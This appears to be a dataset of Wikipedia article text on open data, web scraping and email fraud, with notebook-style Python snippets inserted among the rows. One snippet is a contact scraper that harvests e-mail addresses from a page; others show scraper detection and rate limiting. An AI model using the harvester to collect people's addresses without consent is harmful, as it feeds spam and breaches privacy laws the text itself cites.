compounds, mathematical and scientific formulae, medical data and practice, bioscience and biodiversity. A major barrier to the open data movement is the commercial value of data. Access to, or re-use of, data is often controlled by public or private organizations. Control may be through access restrictions, licenses, copyright, patents and charges for access or re-use. Advocates of open data argue that these restrictions detract from the common good and that data should be available without restrictions or fees. Creators of data often do not consider the need to state the conditions of ownership, licensing and re-use; instead presuming that not asserting copyright enters the data into the public domain. For example, many scientists do not consider the data published with their work to be theirs to control and consider the act of publication in a journal to be an implicit release of data into the commons. The lack of a license makes it difficult to determine the status of a data set and may restrict the use of data offered in an "Open" spirit. Because of this uncertainty it is possible for public or private organizations to aggregate said data, claim that it is protected by copyright, and then resell it. 
Open data can come from any source. This section lists some of the fields that publish (or at least discuss publishing) a large amount of open data. The concept of open access to scientific data was established with the formation of the World Data Center system, in preparation for the International Geophysical Year of 1957-1958. 8 The International Council of Scientific Unions (now the International Council for Science) oversees several World Data Centres with the mission to minimize the risk of data loss and to maximize data accessibility. 9 While the open-science-data movement long predates the Internet, the availability of fast, readily available networking has significantly changed the context of open science data, as publishing or obtaining data has become much less expensive and time-consuming. 10 The Human Genome Project was a major initiative that exemplified the power of open data. It was built upon the so-called Bermuda Principles, stipulating that: "All human genomic sequence information … should be freely available and in the public domain in order to encourage research and development and to maximize its benefit to society". 11 More recent initiatives such as the Structural Genomics Consortium have illustrated that the open data approach can be used productively within the context of industrial R&D. 12 In 2004, the Science Ministers of all nations of the Organisation for Economic Co-operation and Development (OECD), which includes most developed countries of the world, signed a declaration which states that all publicly funded archive data should be made publicly available. 13 Following a request and an intense discussion with data-producing institutions in member states, the OECD published in 2007 the OECD Principles and Guidelines for Access to Research Data from Public Funding as a soft-law recommendation. 14 Examples of open data in science: There are a range of different arguments for government open data. 19 20 Some advocates say that making government information available to the public as machine-readable open data can facilitate government transparency, accountability and public participation. "Open data can be a powerful force for public accountability: it can make existing information easier to analyze, process, and combine than ever before, allowing a new level of public scrutiny." 21 Governments that enable public viewing of data can help citizens engage within the governmental sectors and "add value to that data". 22 Open data experts have nuanced the impact that opening government data may have on government transparency and accountability. In a widely cited paper, scholars David Robinson and Harlan Yu contend that governments may project a veneer of transparency by publishing machine-readable data that does not actually make government more transparent or accountable. 23 Drawing from earlier studies on transparency and anticorruption, 24 World Bank political scientist Tiago C. Peixoto extended Yu and Robinson's argument by highlighting a minimal chain of events necessary for open data to lead to accountability: Some make the case that opening up official information can support technological innovation and economic growth by enabling third parties to develop new kinds of digital applications and services. 26 Several national governments have created websites to distribute a portion of the data they collect. It is a concept for a collaborative project in the municipal government to create and organize a culture for open data or open government data. 
Additionally, other levels of government have established open data websites. There are many government entities pursuing open data in Canada. Data.gov lists the sites of a total of 40 US states and 46 US cities and counties with websites to provide open data, e.g., the state of Maryland, the state of California, US 27 and New York City. 28 At the international level, the United Nations has an open data website that publishes statistical data from member states and UN agencies, 29 and the World Bank published a range of statistical data relating to developing countries. 30 The European Commission has created two portals for the European Union: the EU Open Data Portal, which gives access to open data from the EU institutions, agencies and other bodies, 31 and the European Data Portal, which provides datasets from local, regional and national public bodies across Europe. 32 The two portals were consolidated to data.europa.eu on April 21, 2021. Italy is the first country to release standard processes and guidelines under a Creative Commons license for widespread use in the public administration. The open model is called the Open Data Management Cycle and was adopted in several regions such as Veneto and Umbria. 33 34 35 Main cities like Reggio Calabria and Genova have also adopted this model. citation needed 36 In October 2015, the Open Government Partnership launched the International Open Data Charter, a set of principles and best practices for the release of governmental open data formally adopted by seventeen governments of countries, states and cities during the OGP Global Summit in Mexico. 37 In July 2024, the OECD adopted Creative Commons CC-BY 4.0 licensing for its published data and reports. 38 Many non-profit organizations offer open access to their data, as long as it does not undermine their users', members' or third parties' privacy rights. In comparison to for-profit corporations, they do not seek to monetize their data. OpenNWT launched a website offering open data on elections. 39 CIAT offers open data to anybody who is willing to conduct big data analytics in order to enhance the benefit of international agricultural research. 40 DBLP, which is owned by the non-profit organization Dagstuhl, offers its database of scientific publications from computer science as open data. 41 Hospitality exchange services, including Bewelcome, Warm Showers, and CouchSurfing (before it became for-profit), have offered scientists access to their anonymized data for analysis, public research, and publication. 42 43 44 45 46 At a small level, a business or research organization's policies and strategies towards open data will vary, sometimes greatly. One common strategy employed is the use of a data commons. A data commons is an interoperable software and hardware platform that aggregates (or collocates) data, data infrastructure, and data-producing and data-managing applications in order to better allow a community of users to manage, analyze, and share their data with others over both short- and long-term timelines. 47 48 49 Ideally, this interoperable cyberinfrastructure should be robust enough "to facilitate transitions between stages in the life cycle of a collection" of data and information resources 47 while still being driven by common data models and workspace tools enabling and supporting robust data analysis. 49 The policies and strategies underlying a data commons will ideally involve numerous stakeholders, including the data commons service provider, data contributors, and data users. 
48 Grossman et al. 48 suggest six major considerations for a data commons strategy that better enables open data in businesses and research organizations. Such a strategy should address the need for: Beyond individual businesses and research centers, and at a more macro level, countries like Germany 50 have launched their own official nationwide open data strategies, detailing how data management systems and data commons should be developed, used, and maintained for the greater public good. Opening government data is only a waypoint on the road to improving education, improving government, and building tools to solve other real-world problems. While many arguments have been made categorically, citation needed the following discussion of arguments for and against open data highlights that these arguments often depend highly on the type of data and its potential uses. Arguments made on behalf of open data include the following: It is generally held that factual data cannot be copyrighted. 59 Publishers frequently add copyright statements (often forbidding re-use) to scientific data accompanying publications. It may be unclear whether the factual data embedded in full text are part of the copyright. While the human abstraction of facts from paper publications is normally accepted as legal, there is often an implied restriction on machine extraction by robots. Unlike open access, where groups of publishers have stated their concerns, open data is normally challenged by individual institutions. citation needed Their arguments have been discussed less in public discourse and there are fewer quotes to rely on at this time. Arguments against making all data available as open data include the following: The paper entitled "Optimization of Soft Mobility Localization with Sustainable Policies and Open Data" 63 argues that open data is a valuable tool for improving the sustainability and equity of soft mobility in cities. The author argues that open data can be used to identify the needs of different areas of a city, develop algorithms that are fair and equitable, and justify the installation of soft mobility resources. The goals of the Open Data movement are similar to those of other "Open" movements. Formally, both the definition of Open Data and that of commons revolve around the concept of shared resources with a low barrier to access. Substantially, digital commons include Open Data in that they include resources maintained online, such as data. 68 Overall, looking at the operational principles of Open Data, one can see the overlap between Open Data and (digital) commons in practice. Principles of Open Data are sometimes distinct depending on the type of data under scrutiny. 69 Nonetheless, they are somewhat overlapping and their key rationale is the lack of barriers to the re-use of data(sets). 69 Regardless of their origin, principles across types of Open Data hint at the key elements of the definition of commons. These are, for instance, accessibility, re-use, findability, and non-proprietary status. 69 Additionally, although to a lower extent, the threats and opportunities associated with both Open Data and commons are similar. Synthesizing, they revolve around (risks and) benefits associated with (uncontrolled) use of common resources by a large variety of actors. Both commons and Open Data can be defined by the features of the resources that fit under these concepts, but they can also be defined by the characteristics of the systems their advocates push for. 
Governance is a focus for both Open Data and commons scholars. 69 68 The key elements that outline the peculiarities of commons and Open Data are their differences from (and perhaps opposition to) the dominant market logics as shaped by capitalism. 68 Perhaps it is this feature that emerges in the recent surge of the concept of commons as related to a more social look at digital technologies in the specific forms of digital and, especially, data commons. Application of open data for societal good has been demonstrated in academic research works. 70 The paper "Optimization of Soft Mobility Localization with Sustainable Policies and Open Data" uses open data in two ways. First, it uses open data to identify the needs of different areas of a city. For example, it might use data on population density, traffic congestion, and air quality to determine where soft mobility resources, such as bike racks and charging stations for electric vehicles, are most needed. Second, it uses open data to develop algorithms that are fair and equitable. For example, it might use data on the demographics of a city to ensure that soft mobility resources are distributed in a way that is accessible to everyone, regardless of age, disability, or gender. The paper also discusses the challenges of using open data for soft mobility optimization. One challenge is that open data is often incomplete or inaccurate. Another challenge is that it can be difficult to integrate open data from different sources. Despite these challenges, the paper argues that open data is a valuable tool for improving the sustainability and equity of soft mobility in cities. An example of the relationship between Open Data and commons, and of how their governance can potentially disrupt the market logic otherwise dominating big data, is a project conducted by Human Ecosystem Relazioni in Bologna (Italy). See: https://www.he-r.it/wp-content/uploads/2017/01/HUB-report-impaginato_v1_small.pdf. This project aimed at extrapolating and identifying online social relations surrounding “collaboration” in Bologna. Data was collected from social networks and online platforms for citizen collaboration. Eventually, the data was analyzed for content, meaning, location, timeframe, and other variables. Overall, online social relations for collaboration were analyzed based on network theory. The resulting dataset has been made available online as Open Data (aggregated and anonymized); nonetheless, individuals can reclaim all their data. This has been done with the idea of making data into a commons. This project exemplifies the relationship between Open Data and commons, and how they can disrupt the market logic driving big data use in two ways. First, it shows how such projects, following the rationale of Open Data, can to some extent trigger the creation of effective data commons. The project itself offered different types of support to social network platform users to have content removed. Second, opening data regarding online social network interactions has the potential to significantly reduce the monopolistic power of social network platforms on those data. Several funding bodies which mandate Open Access mandate Open Data. A good expression of requirements (truncated in places) is given by the Canadian Institutes of Health Research (CIHR): 71 Other bodies active in promoting the deposition of data as well as full text include the Wellcome Trust. 
An academic paper published in 2013 advocated that Horizon 2020 (the science funding mechanism of the EU) should mandate that funded projects hand in their databases as "deliverables" at the end of the project, so that they can be checked for third-party usability and then shared. 72 |
340 | https://en.wikipedia.org/wiki/Web_scraping | https://pt.wikipedia.org/wiki/Web_scraping | Web scraping (in Portuguese, 'raspagem da web') is a form of mining that allows the extraction of data from websites, converting it into structured information for later analysis. The most basic type of collection is the manual downloading of pages, or copying and pasting the content, and this can be done by anyone. However, web scraping is generally done by software that simulates human browsing across several sites, extracting specific information. It is an evolving field that shares a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interaction. Web scraping is very similar to web indexing (used by most search engines), but the end motivation is very different. Web indexing is used to help make search engines more efficient, whereas web scraping can be used for different reasons, such as online price comparison, weather monitoring, market research, collection of government data, data monitoring and, in some cases, information theft. Technology increasingly brings us benefits, and nowadays businesses are extremely technology-driven, always looking for improvements and reducing expenditure of time and money. Access to data is often not easy. As much as one might wish that everything were available in one's preferred format, data is published on the internet in different ways. What if you want to combine it with other data or explore it independently? Extracting data from websites manually, that is, by copying and pasting, takes a great deal of effort and wastes a great deal of time. With automated web scraping, this practice saves time, effort and, consequently, money. It can be used to archive the content of a website for later offline access, or to test the website itself for broken links. However, there are cases of dishonest use, such as making illegal copies of content. Some examples of its use are: Web scraping scripts and applications simulate a person browsing a site normally. With these scripts or programs, the user can connect to a site and request a page, exactly as a browser would. The web server sends back the requested page, and the collectors then process the pages of data, which are unstructured or semi-structured, and convert the data into a structured format. Once the data is in a structured format, the user can manipulate and analyze it easily. There are some alternatives for doing web scraping, such as: Some of the most common web scraping techniques are the following: The practice of web scraping has attracted a great deal of controversy because the terms of use of some sites do not allow certain types of data mining. Web scraping can be considered theft of intellectual property. Unfortunately, some people and companies do not care about terms and conditions and extract large amounts of data without permission to do so. Some examples of malicious collection are: As a real example, in Brazil, we can cite the case of an online recruitment company accused of and convicted for unfair competition after collecting customer data from another company. 
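The workflow described above (request a page just as a browser would, let the collector parse the unstructured or semi-structured HTML, and convert it into a structured format) can be illustrated with the libraries already imported at the top of this notebook. The sketch below is only a hedged example: the URL and the article/h2/p selectors are hypothetical placeholders and would need to be adapted to the markup of a real site.

# Minimal scraping sketch: fetch a page, parse the HTML, build a structured table.
# The URL and the 'article' / 'h2' / 'p' selectors are hypothetical placeholders.
import requests
import pandas as pd
from bs4 import BeautifulSoup

def scrape_to_dataframe(url="https://example.com/articles"):
    response = requests.get(url, timeout=10)         # request the page as a browser would
    response.raise_for_status()
    soup = BeautifulSoup(response.text, "html5lib")  # parse the semi-structured HTML
    rows = []
    for item in soup.select("article"):              # assume one record per <article> block
        title = item.find("h2")
        summary = item.find("p")
        rows.append({
            "title": title.get_text(strip=True) if title else None,
            "summary": summary.get_text(strip=True) if summary else None,
        })
    return pd.DataFrame(rows)                        # structured output, ready for analysis

# Example usage:
# df = scrape_to_dataframe()
# print(df.head())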
Therefore, in addition to being aware of all the legal aspects of the site from which you want to extract data, it is important to pay attention to the legal rules regarding: Preventing improper web scraping and related attacks is increasingly difficult, since the distinction between data use motivated by legitimate interests and illegal use is not always clear, but it is possible to take some measures to prevent or reduce these attacks, such as: In addition to the measures mentioned above, it is always good to check users' actions on the website's pages. For example, when a browser requests a page, it also requests and downloads images and CSS; web scrapers, on the other hand, are only interested in the content and will request only the HTML. If this happens over a long period, that user is almost certainly doing web scraping. Another option to prevent the improper use of images is to add a watermark that identifies the owner of the content. |
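The detection idea at the end of the row above (a real browser also fetches images and CSS, while a scraper usually requests only the HTML, over a long period) can be turned into a simple log heuristic. This is a sketch under assumed inputs: the (ip, path) pairs and the thresholds are illustrative, not a real access-log format.

# Flag clients that request many pages but (almost) never the assets a browser would fetch.
from collections import defaultdict

def flag_probable_scrapers(log_entries, min_requests=50, max_asset_ratio=0.02):
    html_hits = defaultdict(int)
    asset_hits = defaultdict(int)
    asset_exts = (".css", ".js", ".png", ".jpg", ".jpeg", ".gif", ".svg", ".woff")
    for ip, path in log_entries:
        if path.lower().endswith(asset_exts):
            asset_hits[ip] += 1
        else:
            html_hits[ip] += 1
    suspects = []
    for ip, pages in html_hits.items():
        total = pages + asset_hits[ip]
        if total >= min_requests and asset_hits[ip] / total <= max_asset_ratio:
            suspects.append(ip)  # many page requests, almost no image/CSS requests
    return suspects

# Example usage: a client fetching only HTML over many requests gets flagged.
# log = [("10.0.0.5", "/page/%d" % i) for i in range(100)] + [("10.0.0.7", "/index"), ("10.0.0.7", "/style.css")]
# print(flag_probable_scrapers(log))  # ['10.0.0.5']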
341 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-32 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
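The contact-scraping example mentioned above (collecting e-mail addresses from a page into a list) is easy to sketch with requests and the re module already imported in this notebook. The URL is a placeholder and the pattern is a deliberately simplified approximation of e-mail syntax, not a complete validator.

# Contact-scraping sketch: fetch a page and collect the e-mail addresses found in it.
import re
import requests

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def scrape_emails(url="https://example.com/contact"):
    html = requests.get(url, timeout=10).text
    return sorted(set(EMAIL_RE.findall(html)))  # deduplicate and sort the matches

# Example usage:
# print(scrape_emails())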
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical-specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical, and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the long tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may include metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 A newer approach uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
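As a small illustration of the DOM-parsing technique described above (build a DOM tree from the HTML and query it with an expression language such as XPath), here is a hedged sketch. It assumes the third-party lxml package is installed (pip install lxml); the inline markup is invented for the example and stands in for a dynamically generated product page.

# DOM parsing with XPath: parse HTML into a tree and select nodes by path expressions.
from lxml import html

SAMPLE = """
<html><body>
  <div class="product"><span class="name">Widget</span><span class="price">$9.99</span></div>
  <div class="product"><span class="name">Gadget</span><span class="price">$19.99</span></div>
</body></html>
"""

tree = html.fromstring(SAMPLE)  # build the DOM tree
names = tree.xpath('//div[@class="product"]/span[@class="name"]/text()')
prices = tree.xpath('//div[@class="product"]/span[@class="price"]/text()')
print(list(zip(names, prices)))  # [('Widget', '$9.99'), ('Gadget', '$19.99')]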
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include BeautifulSoup, a Python library that provides simple methods for extracting data from HTML and XML files; Scrapy, an open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it; Octoparse, a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills; ParseHub, another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites; Apify, a platform that offers a wide range of scraping tools and the ability to create custom scrapers; and InstantAPI.ai, an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattels. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's website during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
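One measure of the kind alluded to above, commonly used to stop or slow a bot, is per-client rate limiting. The sketch below is a minimal sliding-window limiter; the window length and request cap are arbitrary illustrative values, and a production site would normally rely on its web server or proxy for this.

# Sliding-window rate limiter: allow at most MAX_REQUESTS per client IP per WINDOW_SECONDS.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60
MAX_REQUESTS = 100
_recent = defaultdict(deque)  # ip -> timestamps of recent requests

def allow_request(ip, now=None):
    now = time.time() if now is None else now
    q = _recent[ip]
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()               # drop timestamps that fell out of the window
    if len(q) >= MAX_REQUESTS:
        return False              # throttle: too many requests in the window
    q.append(now)
    return True

# Example usage:
# for i in range(105):
#     ok = allow_request("10.0.0.5", now=1000.0 + i * 0.1)
# print(ok)  # False once the cap of 100 requests in 60 seconds is exceeded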
342 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Special:CiteThisPage&page=Data_scraping&id=1214697307&wpFormIdentifier=titleform | IMPORTANT NOTE: Most educators and professionals do not consider it appropriate to use tertiary sources such as encyclopedias as a sole source for any information—citing an encyclopedia as an important reference in footnotes or bibliographies may result in censure or a failing grade. Wikipedia articles should be used for background information, as a reference for correct terminology and search terms, and as a starting point for further research. As with any community-built reference, there is a possibility for error in Wikipedia's content—please check your facts against multiple sources and read our disclaimers for more information. Please remember to check your manual of style, standards guide or instructor's guidelines for the exact syntax to suit your needs. For more detailed advice, see Citing Wikipedia. Wikipedia contributors. (2024, March 20). Data scraping. In Wikipedia, The Free Encyclopedia. Retrieved 15:33, August 17, 2024, from https://en.wikipedia.org/w/index.php?title=Data_scraping&oldid=1214697307 Wikipedia contributors. "Data scraping." Wikipedia, The Free Encyclopedia. Wikipedia, The Free Encyclopedia, 20 Mar. 2024. Web. 17 Aug. 2024. Wikipedia contributors, 'Data scraping', Wikipedia, The Free Encyclopedia, 20 March 2024, 16:03 UTC, https://en.wikipedia.org/w/index.php?title=Data_scraping&oldid=1214697307 [accessed 17 August 2024] Wikipedia contributors, "Data scraping," Wikipedia, The Free Encyclopedia, https://en.wikipedia.org/w/index.php?title=Data_scraping&oldid=1214697307 (accessed August 17, 2024). Wikipedia contributors. Data scraping [Internet]. Wikipedia, The Free Encyclopedia; 2024 Mar 20, 16:03 UTC [cited 2024 Aug 17]. Available from: https://en.wikipedia.org/w/index.php?title=Data_scraping&oldid=1214697307. Data scraping, https://en.wikipedia.org/w/index.php?title=Data_scraping&oldid=1214697307 (last visited Aug. 17, 2024). Wikipedia contributors. Data scraping. Wikipedia, The Free Encyclopedia. March 20, 2024, 16:03 UTC. Available at: https://en.wikipedia.org/w/index.php?title=Data_scraping&oldid=1214697307. Accessed August 17, 2024. When using the LaTeX package url (\usepackage{url} somewhere in the preamble), which tends to give much more nicely formatted web addresses, the following may be preferred: |
343 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Email_fraud | Email fraud (or email scam) is intentional deception for either personal gain or to damage another individual using email as the vehicle. Almost as soon as email became widely used, it began to be used as a means to defraud people, just as telephony and paper mail were used by previous generations. Email fraud can take the form of a confidence trick ("con game", "scam", etc.). Some confidence tricks tend to exploit the inherent greed and dishonesty of their victims. The prospect of a 'bargain' or 'something for nothing' can be very tempting. Email fraud, as with other "bunco schemes", usually targets naïve individuals who put their confidence in schemes to get rich quickly. These include 'too good to be true' investments or offers to sell popular items at 'impossibly low' prices. Another form of email fraud is an impersonation technique known as email spoofing: the recipient is misled by falsified origin information (From:) into making an anticipated payment into the fraudster's account rather than the correct one. The method is known as phishing or spear phishing: 'phishing' involves sending thousands of emails claiming, for example, that an account has been compromised; 'spear phishing' typically involves targeted and personalized emails or messages designed to deceive specific individuals or organizations into revealing sensitive information or performing malicious actions. 1 Email sent from someone pretending to be someone else is known as spoofing. Spoofing may take place in a number of ways. Common to all of them is 